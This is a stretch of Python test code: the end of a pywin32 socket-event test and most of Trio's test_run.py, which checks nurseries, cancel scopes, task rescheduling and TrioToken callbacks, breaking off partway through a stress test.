res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events: break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
if __name__ == '__main__':
testmain()
|
test_run.py
|
import contextvars
import functools
import platform
import sys
import threading
import time
import types
import warnings
from contextlib import contextmanager, ExitStack
from math import inf
from textwrap import dedent
import gc
import attr
import outcome
import sniffio
import pytest
from .tutil import (
slow,
check_sequence_matches,
gc_collect_harder,
ignore_coroutine_never_awaited_warnings,
buggy_pypy_asyncgens,
)
from ... import _core
from .._run import DEADLINE_HEAP_MIN_PRUNE_THRESHOLD
from ..._threads import to_thread_run_sync
from ..._timeouts import sleep, fail_after
from ...testing import (
wait_all_tasks_blocked,
Sequencer,
assert_checkpoints,
)
# slightly different from _timeouts.sleep_forever because it returns the value
# it's rescheduled with, which is really only useful for tests of
# rescheduling...
async def sleep_forever():
return await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
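# A minimal illustrative sketch (not one of the real tests, and not collected
# by pytest) of the round trip that sleep_forever relies on: one task parks
# itself with wait_task_rescheduled, and another task wakes it with
# reschedule, passing the value that the sleeper's await then returns.
async def _reschedule_round_trip_sketch():
    parked_task = None

    async def sleeper():
        nonlocal parked_task
        parked_task = _core.current_task()
        # Abort.SUCCEEDED means "fine, cancel me" if a cancellation arrives first.
        value = await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
        assert value == "wake-up value"

    async with _core.open_nursery() as nursery:
        nursery.start_soon(sleeper)
        await wait_all_tasks_blocked()
        _core.reschedule(parked_task, outcome.Value("wake-up value"))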
def test_basic():
async def trivial(x):
return x
assert _core.run(trivial, 8) == 8
with pytest.raises(TypeError):
# Missing an argument
_core.run(trivial)
with pytest.raises(TypeError):
# Not an async function
_core.run(lambda: None)
async def trivial2(x):
await _core.checkpoint()
return x
assert _core.run(trivial2, 1) == 1
def test_initial_task_error():
async def main(x):
raise ValueError(x)
with pytest.raises(ValueError) as excinfo:
_core.run(main, 17)
assert excinfo.value.args == (17,)
def test_run_nesting():
async def inception():
async def main(): # pragma: no cover
pass
return _core.run(main)
with pytest.raises(RuntimeError) as excinfo:
_core.run(inception)
assert "from inside" in str(excinfo.value)
async def test_nursery_warn_use_async_with():
with pytest.raises(RuntimeError) as excinfo:
on = _core.open_nursery()
with on:
pass # pragma: no cover
excinfo.match(
r"use 'async with open_nursery\(...\)', not 'with open_nursery\(...\)'"
)
# avoid unawaited coro.
async with on:
pass
async def test_nursery_main_block_error_basic():
exc = ValueError("whoops")
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery():
raise exc
assert excinfo.value is exc
async def test_child_crash_basic():
exc = ValueError("uh oh")
async def erroring():
raise exc
try:
# nursery.__aexit__ propagates exception from child back to parent
async with _core.open_nursery() as nursery:
nursery.start_soon(erroring)
except ValueError as e:
assert e is exc
async def test_basic_interleave():
async def looper(whoami, record):
for i in range(3):
record.append((whoami, i))
await _core.checkpoint()
record = []
async with _core.open_nursery() as nursery:
nursery.start_soon(looper, "a", record)
nursery.start_soon(looper, "b", record)
check_sequence_matches(
record, [{("a", 0), ("b", 0)}, {("a", 1), ("b", 1)}, {("a", 2), ("b", 2)}]
)
def test_task_crash_propagation():
looper_record = []
async def looper():
try:
while True:
await _core.checkpoint()
except _core.Cancelled:
print("looper cancelled")
looper_record.append("cancelled")
async def crasher():
raise ValueError("argh")
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(looper)
nursery.start_soon(crasher)
with pytest.raises(ValueError) as excinfo:
_core.run(main)
assert looper_record == ["cancelled"]
assert excinfo.value.args == ("argh",)
def test_main_and_task_both_crash():
# If main crashes and there's also a task crash, then we get both in a
# MultiError
async def crasher():
raise ValueError
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
print(excinfo.value)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
def test_two_child_crashes():
async def crasher(etype):
raise etype
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher, KeyError)
nursery.start_soon(crasher, ValueError)
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
async def test_child_crash_wakes_parent():
async def crasher():
raise ValueError
with pytest.raises(ValueError):
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
await sleep_forever()
async def test_reschedule():
t1 = None
t2 = None
async def child1():
nonlocal t1, t2
t1 = _core.current_task()
print("child1 start")
x = await sleep_forever()
print("child1 woke")
assert x == 0
print("child1 rescheduling t2")
_core.reschedule(t2, outcome.Error(ValueError()))
print("child1 exit")
async def child2():
nonlocal t1, t2
print("child2 start")
t2 = _core.current_task()
_core.reschedule(t1, outcome.Value(0))
print("child2 sleep")
with pytest.raises(ValueError):
await sleep_forever()
print("child2 successful exit")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
# let t1 run and fall asleep
await _core.checkpoint()
nursery.start_soon(child2)
async def test_current_time():
t1 = _core.current_time()
# Windows clock is pretty low-resolution -- appveyor tests fail unless we
# sleep for a bit here.
time.sleep(time.get_clock_info("perf_counter").resolution)
t2 = _core.current_time()
assert t1 < t2
async def test_current_time_with_mock_clock(mock_clock):
start = mock_clock.current_time()
assert mock_clock.current_time() == _core.current_time()
assert mock_clock.current_time() == _core.current_time()
mock_clock.jump(3.14)
assert start + 3.14 == mock_clock.current_time() == _core.current_time()
async def test_current_clock(mock_clock):
assert mock_clock is _core.current_clock()
async def test_current_task():
parent_task = _core.current_task()
async def child():
assert _core.current_task().parent_nursery.parent_task is parent_task
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
async def test_root_task():
root = _core.current_root_task()
assert root.parent_nursery is root.eventual_parent_nursery is None
def test_out_of_context():
with pytest.raises(RuntimeError):
_core.current_task()
with pytest.raises(RuntimeError):
_core.current_time()
async def test_current_statistics(mock_clock):
# Make sure all the early startup stuff has settled down
await wait_all_tasks_blocked()
# A child that sticks around to make some interesting stats:
async def child():
try:
await sleep_forever()
except _core.Cancelled:
pass
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us
assert stats.tasks_living == 3
assert stats.run_sync_soon_queue_size == 0
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
token = _core.current_trio_token()
token.run_sync_soon(lambda: None)
token.run_sync_soon(lambda: None, idempotent=True)
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us + child
assert stats.tasks_living == 4
# the exact value here might shift if we change how we do accounting
# (currently it only counts tasks that we already know will be
# runnable on the next pass), but still useful to at least test the
# difference between now and after we wake up the child:
assert stats.tasks_runnable == 0
assert stats.run_sync_soon_queue_size == 2
nursery.cancel_scope.cancel()
stats = _core.current_statistics()
print(stats)
assert stats.tasks_runnable == 1
# Give the child a chance to die and the run_sync_soon a chance to clear
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope(deadline=_core.current_time() + 5):
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == 5
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == inf
async def test_cancel_scope_repr(mock_clock):
scope = _core.CancelScope()
assert "unbound" in repr(scope)
with scope:
assert "active" in repr(scope)
scope.deadline = _core.current_time() - 1
assert "deadline is 1.00 seconds ago" in repr(scope)
scope.deadline = _core.current_time() + 10
assert "deadline is 10.00 seconds from now" in repr(scope)
# when not in async context, can't get the current time
assert "deadline" not in await to_thread_run_sync(repr, scope)
scope.cancel()
assert "cancelled" in repr(scope)
assert "exited" in repr(scope)
def test_cancel_points():
async def main1():
with _core.CancelScope() as scope:
await _core.checkpoint_if_cancelled()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint_if_cancelled()
_core.run(main1)
async def main2():
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main2)
async def main3():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
_core.run(main3)
async def main4():
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.cancel_shielded_checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main4)
async def test_cancel_edge_cases():
with _core.CancelScope() as scope:
# Two cancels in a row -- idempotent
scope.cancel()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert scope.cancelled_caught
with _core.CancelScope() as scope:
# Check level-triggering
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
with pytest.raises(_core.Cancelled):
await sleep_forever()
async def test_cancel_scope_multierror_filtering():
async def crasher():
raise KeyError
try:
with _core.CancelScope() as outer:
try:
async with _core.open_nursery() as nursery:
# Two children that get cancelled by the nursery scope
nursery.start_soon(sleep_forever) # t1
nursery.start_soon(sleep_forever) # t2
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
# One child that gets cancelled by the outer scope
nursery.start_soon(sleep_forever) # t3
outer.cancel()
# And one that raises a different error
nursery.start_soon(crasher) # t4
# and then our __aexit__ also receives an outer Cancelled
except _core.MultiError as multi_exc:
# Since the outer scope became cancelled before the
# nursery block exited, all cancellations inside the
# nursery block continue propagating to reach the
# outer scope.
assert len(multi_exc.exceptions) == 5
summary = {}
for exc in multi_exc.exceptions:
summary.setdefault(type(exc), 0)
summary[type(exc)] += 1
assert summary == {_core.Cancelled: 4, KeyError: 1}
raise
except AssertionError: # pragma: no cover
raise
except BaseException as exc:
# This is outside the outer scope, so all the Cancelled
# exceptions should have been absorbed, leaving just a regular
# KeyError from crasher()
assert type(exc) is KeyError
else: # pragma: no cover
assert False
async def test_precancelled_task():
# a task that gets spawned into an already-cancelled nursery should begin
# execution (https://github.com/python-trio/trio/issues/41), but get a
# cancelled error at its first blocking call.
record = []
async def blocker():
record.append("started")
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.cancel_scope.cancel()
nursery.start_soon(blocker)
assert record == ["started"]
async def test_cancel_shielding():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
await _core.checkpoint()
outer.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
assert inner.shield is False
with pytest.raises(TypeError):
inner.shield = "hello"
assert inner.shield is False
inner.shield = True
assert inner.shield is True
# shield protects us from 'outer'
await _core.checkpoint()
with _core.CancelScope() as innerest:
innerest.cancel()
# but it doesn't protect us from scope inside inner
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
await _core.checkpoint()
inner.shield = False
# can disable shield again
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# re-enable shield
inner.shield = True
await _core.checkpoint()
# shield doesn't protect us from inner itself
inner.cancel()
# This should now raise, but be absorbed by the inner scope
await _core.checkpoint()
assert inner.cancelled_caught
# make sure that cancellation propagates immediately to all children
async def test_cancel_inheritance():
record = set()
async def leaf(ident):
try:
await sleep_forever()
except _core.Cancelled:
record.add(ident)
async def worker(ident):
async with _core.open_nursery() as nursery:
nursery.start_soon(leaf, ident + "-l1")
nursery.start_soon(leaf, ident + "-l2")
async with _core.open_nursery() as nursery:
nursery.start_soon(worker, "w1")
nursery.start_soon(worker, "w2")
nursery.cancel_scope.cancel()
assert record == {"w1-l1", "w1-l2", "w2-l1", "w2-l2"}
async def test_cancel_shield_abort():
with _core.CancelScope() as outer:
async with _core.open_nursery() as nursery:
outer.cancel()
nursery.cancel_scope.shield = True
# The outer scope is cancelled, but this task is protected by the
# shield, so it manages to get to sleep
record = []
async def sleeper():
record.append("sleeping")
try:
await sleep_forever()
except _core.Cancelled:
record.append("cancelled")
nursery.start_soon(sleeper)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# now when we unshield, it should abort the sleep.
nursery.cancel_scope.shield = False
# wait for the task to finish before entering the nursery
# __aexit__, because __aexit__ could make it spuriously look like
# this worked by cancelling the nursery scope. (When originally
# written, without these last few lines, the test spuriously
# passed, even though shield assignment was buggy.)
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
assert record == ["sleeping", "cancelled"]
async def test_basic_timeout(mock_clock):
start = _core.current_time()
with _core.CancelScope() as scope:
assert scope.deadline == inf
scope.deadline = start + 1
assert scope.deadline == start + 1
assert not scope.cancel_called
mock_clock.jump(2)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
assert not scope.cancel_called
start = _core.current_time()
with _core.CancelScope(deadline=start + 1) as scope:
mock_clock.jump(2)
await sleep_forever()
# But then the scope swallowed the exception... but we can still see it
# here:
assert scope.cancel_called
assert scope.cancelled_caught
# changing deadline
start = _core.current_time()
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.deadline = start + 10
await _core.checkpoint()
mock_clock.jump(5)
await _core.checkpoint()
scope.deadline = start + 1
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
async def test_cancel_scope_nesting():
# Nested scopes: if two triggering at once, the outer one wins
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
with _core.CancelScope() as scope3:
scope3.cancel()
scope2.cancel()
await sleep_forever()
assert scope3.cancel_called
assert not scope3.cancelled_caught
assert scope2.cancel_called
assert scope2.cancelled_caught
assert not scope1.cancel_called
assert not scope1.cancelled_caught
# shielding
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
scope1.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
scope2.shield = True
await _core.checkpoint()
scope2.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# if a scope is pending, but then gets popped off the stack, then it
# isn't delivered
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.checkpoint()
assert not scope.cancelled_caught
# Regression test for https://github.com/python-trio/trio/issues/1175
async def test_unshield_while_cancel_propagating():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
outer.cancel()
try:
await _core.checkpoint()
finally:
inner.shield = True
assert outer.cancelled_caught and not inner.cancelled_caught
async def test_cancel_unbound():
async def sleep_until_cancelled(scope):
with scope, fail_after(1):
await sleep_forever()
# Cancel before entry
scope = _core.CancelScope()
scope.cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
# Cancel after entry
scope = _core.CancelScope()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
await wait_all_tasks_blocked()
scope.cancel()
# Shield before entry
scope = _core.CancelScope()
scope.shield = True
with _core.CancelScope() as outer, scope:
outer.cancel()
await _core.checkpoint()
scope.shield = False
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# Can't reuse
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert not scope.cancelled_caught
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't reenter
with _core.CancelScope() as scope:
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't enter from multiple tasks simultaneously
scope = _core.CancelScope()
async def enter_scope():
with scope:
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.start_soon(enter_scope, name="this one")
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
nursery.cancel_scope.cancel()
# If not yet entered, cancel_called is true when the deadline has passed
# even if cancel() hasn't been called yet
scope = _core.CancelScope(deadline=_core.current_time() + 1)
assert not scope.cancel_called
scope.deadline -= 1
assert scope.cancel_called
scope.deadline += 1
assert scope.cancel_called # never become un-cancelled
async def test_cancel_scope_misnesting():
outer = _core.CancelScope()
inner = _core.CancelScope()
with ExitStack() as stack:
stack.enter_context(outer)
with inner:
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# No further error is raised when exiting the inner context
# If there are other tasks inside the abandoned part of the cancel tree,
# they get cancelled when the misnesting is detected
async def task1():
with pytest.raises(_core.Cancelled):
await sleep_forever()
# Even if inside another cancel scope
async def task2():
with _core.CancelScope():
with pytest.raises(_core.Cancelled):
await sleep_forever()
with ExitStack() as stack:
stack.enter_context(_core.CancelScope())
async with _core.open_nursery() as nursery:
nursery.start_soon(task1)
nursery.start_soon(task2)
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# Variant that makes the child tasks direct children of the scope
# that noticed the misnesting:
nursery_mgr = _core.open_nursery()
nursery = await nursery_mgr.__aenter__()
try:
nursery.start_soon(task1)
nursery.start_soon(task2)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
nursery.cancel_scope.__exit__(None, None, None)
finally:
with pytest.raises(RuntimeError) as exc_info:
await nursery_mgr.__aexit__(*sys.exc_info())
assert "which had already been exited" in str(exc_info.value)
assert type(exc_info.value.__context__) is _core.MultiError
assert len(exc_info.value.__context__.exceptions) == 3
cancelled_in_context = False
for exc in exc_info.value.__context__.exceptions:
assert isinstance(exc, RuntimeError)
assert "closed before the task exited" in str(exc)
cancelled_in_context |= isinstance(exc.__context__, _core.Cancelled)
assert cancelled_in_context # for the sleep_forever
# Trying to exit a cancel scope from an unrelated task raises an error
# without affecting any state
async def task3(task_status):
with _core.CancelScope() as scope:
task_status.started(scope)
await sleep_forever()
async with _core.open_nursery() as nursery:
scope = await nursery.start(task3)
with pytest.raises(RuntimeError, match="from unrelated"):
scope.__exit__(None, None, None)
scope.cancel()
@slow
async def test_timekeeping():
# probably a good idea to use a real clock for *one* test anyway...
TARGET = 1.0
# give it a few tries in case of random CI server flakiness
for _ in range(4):
real_start = time.perf_counter()
with _core.CancelScope() as scope:
scope.deadline = _core.current_time() + TARGET
await sleep_forever()
real_duration = time.perf_counter() - real_start
accuracy = real_duration / TARGET
print(accuracy)
# Actual time elapsed should always be >= target time
# (== is possible depending on system behavior for time.perf_counter resolution)
if 1.0 <= accuracy < 2: # pragma: no branch
break
else: # pragma: no cover
assert False
async def test_failed_abort():
stubborn_task = [None]
stubborn_scope = [None]
record = []
async def stubborn_sleeper():
stubborn_task[0] = _core.current_task()
with _core.CancelScope() as scope:
stubborn_scope[0] = scope
record.append("sleep")
x = await _core.wait_task_rescheduled(lambda _: _core.Abort.FAILED)
assert x == 1
record.append("woke")
try:
await _core.checkpoint_if_cancelled()
except _core.Cancelled:
record.append("cancelled")
async with _core.open_nursery() as nursery:
nursery.start_soon(stubborn_sleeper)
await wait_all_tasks_blocked()
assert record == ["sleep"]
stubborn_scope[0].cancel()
await wait_all_tasks_blocked()
# cancel didn't wake it up
assert record == ["sleep"]
# wake it up again by hand
_core.reschedule(stubborn_task[0], outcome.Value(1))
assert record == ["sleep", "woke", "cancelled"]
def test_broken_abort():
async def main():
# These yields are here to work around an annoying warning -- we're
# going to crash the main loop, and if we (by chance) do this before
# the run_sync_soon task runs for the first time, then Python gives us
# a spurious warning about it not being awaited. (I mean, the warning
# is correct, but here we're testing our ability to deliver a
# semi-meaningful error after things have gone totally pear-shaped, so
# it's not relevant.) By letting the run_sync_soon_task run first, we
# avoid the warning.
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope() as scope:
scope.cancel()
# None is not a legal return value here
await _core.wait_task_rescheduled(lambda _: None)
with pytest.raises(_core.TrioInternalError):
_core.run(main)
# Because this crashes, various __del__ methods print complaints on
# stderr. Make sure that they get run now, so the output is attached to
# this test.
gc_collect_harder()
def test_error_in_run_loop():
# Blow stuff up real good to check we at least get a TrioInternalError
async def main():
task = _core.current_task()
task._schedule_points = "hello!"
await _core.checkpoint()
with ignore_coroutine_never_awaited_warnings():
with pytest.raises(_core.TrioInternalError):
_core.run(main)
async def test_spawn_system_task():
record = []
async def system_task(x):
record.append(("x", x))
record.append(("ki", _core.currently_ki_protected()))
await _core.checkpoint()
_core.spawn_system_task(system_task, 1)
await wait_all_tasks_blocked()
assert record == [("x", 1), ("ki", True)]
# intentionally make a system task crash
def test_system_task_crash():
async def crasher():
raise KeyError
async def main():
_core.spawn_system_task(crasher)
await sleep_forever()
with pytest.raises(_core.TrioInternalError):
_core.run(main)
def test_system_task_crash_MultiError():
async def crasher1():
raise KeyError
async def crasher2():
raise ValueError
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher1)
nursery.start_soon(crasher2)
async def main():
_core.spawn_system_task(system_task)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
me = excinfo.value.__cause__
assert isinstance(me, _core.MultiError)
assert len(me.exceptions) == 2
for exc in me.exceptions:
assert isinstance(exc, (KeyError, ValueError))
def test_system_task_crash_plus_Cancelled():
# Set up a situation where a system task crashes with a
# MultiError([Cancelled, ValueError])
async def crasher():
try:
await sleep_forever()
except _core.Cancelled:
raise ValueError
async def cancelme():
await sleep_forever()
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
nursery.start_soon(cancelme)
async def main():
_core.spawn_system_task(system_task)
# then we exit, triggering a cancellation
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is ValueError
def test_system_task_crash_KeyboardInterrupt():
async def ki():
raise KeyboardInterrupt
async def main():
_core.spawn_system_task(ki)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert isinstance(excinfo.value.__cause__, KeyboardInterrupt)
# This used to fail because checkpoint was a yield followed by an immediate
# reschedule. So we had:
# 1) this task yields
# 2) this task is rescheduled
# ...
# 3) next iteration of event loop starts, runs timeouts
# 4) this task has timed out
# 5) ...but it's on the run queue, so the timeout is queued to be delivered
# the next time that it's blocked.
async def test_yield_briefly_checks_for_timeout(mock_clock):
with _core.CancelScope(deadline=_core.current_time() + 5):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
mock_clock.jump(10)
await _core.checkpoint()
# This tests that sys.exc_info is properly saved/restored as we swap between
# tasks. It turns out that the interpreter automagically handles this for us
# so there's no special code in Trio required to pass this test, but it's
# still nice to know that it works :-).
#
# Update: it turns out I was right to be nervous! see the next test...
async def test_exc_info():
record = []
seq = Sequencer()
async def child1():
with pytest.raises(ValueError) as excinfo:
try:
async with seq(0):
pass # we don't yield until seq(2) below
record.append("child1 raise")
raise ValueError("child1")
except ValueError:
record.append("child1 sleep")
async with seq(2):
pass
assert "child2 wake" in record
record.append("child1 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child1 success")
async def child2():
with pytest.raises(KeyError) as excinfo:
async with seq(1):
pass # we don't yield until seq(3) below
assert "child1 sleep" in record
record.append("child2 wake")
assert sys.exc_info() == (None, None, None)
try:
raise KeyError("child2")
except KeyError:
record.append("child2 sleep again")
async with seq(3):
pass
assert "child1 re-raise" in record
record.append("child2 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child2 success")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
nursery.start_soon(child2)
assert record == [
"child1 raise",
"child1 sleep",
"child2 wake",
"child2 sleep again",
"child1 re-raise",
"child1 success",
"child2 re-raise",
"child2 success",
]
# At least as of CPython 3.6, using .throw() to raise an exception inside a
# coroutine/generator causes the original exc_info state to be lost, so things
# like re-raising and exception chaining are broken.
#
# https://bugs.python.org/issue29587
async def test_exc_info_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
try:
await sleep_forever()
except Exception:
pass
raise
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
# Similar to previous test -- if the ValueError() gets sent in via 'throw',
# then Python's normal implicit chaining stuff is broken.
async def test_exception_chaining_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
await sleep_forever()
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
assert isinstance(excinfo.value.__context__, KeyError)
async def test_nursery_exception_chaining_doesnt_make_context_loops():
async def crasher():
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise ValueError
# the MultiError should not have the KeyError or ValueError as context
assert excinfo.value.__context__ is None
def test_TrioToken_identity():
async def get_and_check_token():
token = _core.current_trio_token()
# Two calls in the same run give the same object
assert token is _core.current_trio_token()
return token
t1 = _core.run(get_and_check_token)
t2 = _core.run(get_and_check_token)
assert t1 is not t2
assert t1 != t2
assert hash(t1) != hash(t2)
async def test_TrioToken_run_sync_soon_basic():
record = []
def cb(x):
record.append(("cb", x))
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
assert not record
await wait_all_tasks_blocked()
assert record == [("cb", 1)]
def test_TrioToken_run_sync_soon_too_late():
token = None
async def main():
nonlocal token
token = _core.current_trio_token()
_core.run(main)
assert token is not None
with pytest.raises(_core.RunFinishedError):
token.run_sync_soon(lambda: None) # pragma: no branch
async def test_TrioToken_run_sync_soon_idempotent():
record = []
def cb(x):
record.append(x)
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
await wait_all_tasks_blocked()
assert len(record) == 3
assert sorted(record) == [1, 1, 2]
# ordering test
record = []
for _ in range(3):
for i in range(100):
token.run_sync_soon(cb, i, idempotent=True)
await wait_all_tasks_blocked()
# We guarantee FIFO
assert record == list(range(100))
def test_TrioToken_run_sync_soon_idempotent_requeue():
# We guarantee that if a call has finished, queueing it again will call it
# again. Due to the lack of synchronization, this effectively means that
# we have to guarantee that once a call has *started*, queueing it again
# will call it again. Also this is much easier to test :-)
record = []
def redo(token):
record.append(None)
try:
token.run_sync_soon(redo, token, idempotent=True)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
token.run_sync_soon(redo, token, idempotent=True)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
_core.run(main)
assert len(record) >= 2
def test_TrioToken_run_sync_soon_after_main_crash():
record = []
async def main():
token = _core.current_trio_token()
# After main exits but before finally cleaning up, callback processed
# normally
token.run_sync_soon(lambda: record.append("sync-cb"))
raise ValueError
with pytest.raises(ValueError):
_core.run(main)
assert record == ["sync-cb"]
def test_TrioToken_run_sync_soon_crashes():
record = set()
async def main():
token = _core.current_trio_token()
token.run_sync_soon(lambda: dict()["nope"])
# check that a crashing run_sync_soon callback doesn't stop further
# calls to run_sync_soon
token.run_sync_soon(lambda: record.add("2nd run_sync_soon ran"))
try:
await sleep_forever()
except _core.Cancelled:
record.add("cancelled!")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == {"2nd run_sync_soon ran", "cancelled!"}
async def test_TrioToken_run_sync_soon_FIFO():
N = 100
record = []
token = _core.current_trio_token()
for i in range(N):
token.run_sync_soon(lambda j: record.append(j), i)
await wait_all_tasks_blocked()
assert record == list(range(N))
def test_TrioToken_run_sync_soon_starvation_resistance():
# Even if we push callbacks in from callbacks, so that the callback queue
# never empties out, then we still can't starve out other tasks from
# running.
token = None
record = []
def naughty_cb(i):
nonlocal token
try:
token.run_sync_soon(naughty_cb, i + 1)
except _core.RunFinishedError:
record.append(("run finished", i))
async def main():
nonlocal token
token = _core.current_trio_token()
token.run_sync_soon(naughty_cb, 0)
record.append("starting")
for _ in range(20):
await _core.checkpoint()
_core.run(main)
assert len(record) == 2
assert record[0] == "starting"
assert record[1][0] == "run finished"
assert record[1][1] >= 19
def test_TrioToken_run_sync_soon_threaded_stress_test():
cb_counter = 0
def cb():
nonlocal cb_counter
cb_counter += 1
def stress_thread(token):
try:
while True:
token.run_sync_soon(cb)
time.sleep(0)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=stress_thread, args=(token,))
thread.start()
for _ in range(10):
start_value = cb_counter
while cb_counter == start_value:
await sleep(0.01)
_core.run(main)
print(cb_counter)
async def test_TrioToken_run_sync_soon_massive_queue():
# There are edge cases in the wakeup fd code when the wakeup fd overflows,
# so let's try to make that happen. This is also just a good stress test
# in general. (With the current-as-of-2017-02-14 code using a socketpair
# with minimal buffer, Linux takes 6 wakeups to fill the buffer and macOS
# takes 1 wakeup. So 1000 is overkill if anything. Windows OTOH takes
# ~600,000 wakeups, but has the same code paths...)
COUNT = 1000
token = _core.current_trio_token()
counter = [0]
def cb(i):
# This also tests FIFO ordering of callbacks
assert counter[0] == i
counter[0] += 1
for i in range(COUNT):
